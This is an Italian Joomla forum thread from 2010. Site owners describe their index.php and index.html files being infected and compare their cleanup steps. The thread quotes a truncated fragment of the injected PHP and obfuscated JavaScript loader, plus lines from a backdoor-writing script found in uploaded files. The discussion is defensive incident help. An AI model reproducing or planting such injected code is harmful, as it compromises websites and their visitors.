Joomla.it Forum
Non solo Joomla... => Sicurezza => : elasticgirl 27 May 2010, 08:56:53
-
Salve,
Nei file index.php e index2.php ho trovato come prima riga:<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var ez=window;function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var sdkajsnd=String.fromCharCode(101,118,97)+"l";function fds(){return asd($a);}var $a="Z64zZ3
cut
v7Z3c07
Non me ne sarei accorta se google webmaster tool non avessi bloccato la mia sitemap.xml.
Andando a verificare il componente xmap in preferenze mi dà questo errore:
Fatal error: Cannot redeclare security_update() (previously declared in /web/htdocs/www.settingweb.it/home/administrator/index2.php:1) in /web/htdocs/www.settingweb.it/home/administrator/index.php on line 1
effettivamente c'è quella linea di codice che vi ho posto prima.
DOMANDA: è un bug del Joomla 1.5.15 oppure un attacco via ftp?? Come risolvere il problema??
-
postando nella sezione opportuna e prima ancora di farlo leggendo quelli che hanno lo stesso problema.
M.
-
stesso problema,
ma non c'è 1 sezione dedicata alla sicurezza?
-
Sì,
c'è una sezione dedicata alla sicurezza.
Si chiama "Sicurezza" ::)
Sposto il messaggio in detta sezione.
-
ho scoperto lo stesso problema anch'io. tutti i files index con estensione php sono stati "infettati" con 'sto codice bastardo.
il sito è stato segnalato da Google come a rischio, con tanto di finestra rossa su FireFox.
ho rimosso tutte le occorrenze dello script (sembra che i files index.html non siano stati toccati) e fatto una ricerca su Google per saperne di più. qualcuno afferma che potrebbe essere lo stesso server ad essere stato infettato: elasticgirl, per caso anche il tuo è su un server *** che inizia per AR e finisce per BA - che è il nome di un'isola"? (non lo si può scrivere, a quanto pare, 'sto nome) ***
UPDATE
mi correggo: ho appena trovato lo script dentro il file /components/index.html, quindi anche i files html sono stati infettatti...
UPDATE 2
ho trovato 2 files mooolto sospetti in /images/stories
i nomi sono:
- sets.php
- storieslist.php
ins sets.php alcune linee del codice dicono:
if (!file_write("./unknown.php",$unk,1))exit("yazamadim\n<br>");
else echo "backdoor writed\n<br>";
il che mi fa sospettare che il nostro amico s'è aperto una backdoor nel sito, o qualcosa di simile...
boh, come ha fatto non lo so...
-
Premetto che ho una decina di siti ospitati dal medesimo provider e in uno si è presentato lo stesso problema esposto in questa discussione, nel sito in questione sono stati sovrascritti i file index.php e index2.php sia nella root che in admin, e anche tutti i file index.html situati nelle cartelle principali di joomla -e inoltre nella parte amministrativa in CONFIGURAZIONE FTP dove normalmente è vuoto era presente come user: user e una password -che poi ho cancellato- Ho trovato tutti file modificati controllando le date delle modifiche (risalenti al il 2 giugno ... ero in ferie) ho sovrascritto tutti i file infetti e aggiornato alla xx.18 - cambiato tutte le psw - Ora è ancora off-line e a parte l'avviso di firfox-google ancora attivo, il sito sembra ok (con IE lo vedo senza avvisi o richieste di istallazione o allarmi dell'antivirus ) ma mi rimane il dubbio se occorre fare ulteriori operazioni sul data base o dove?? - Chi ha risolto il problema, con quali modalità ? e principalmente se conosce anche la causa di questa intrusione ?? Non vorrei avere gli stessi problemi con gli altri siti o almeno prevenirli
Grazie !
-
se cerchi invece di appenderti ai post degli altri risolvi e comprendi anche tu, la sezione è piena di casi come il tuo
M.
-
Grazie troppo gentile!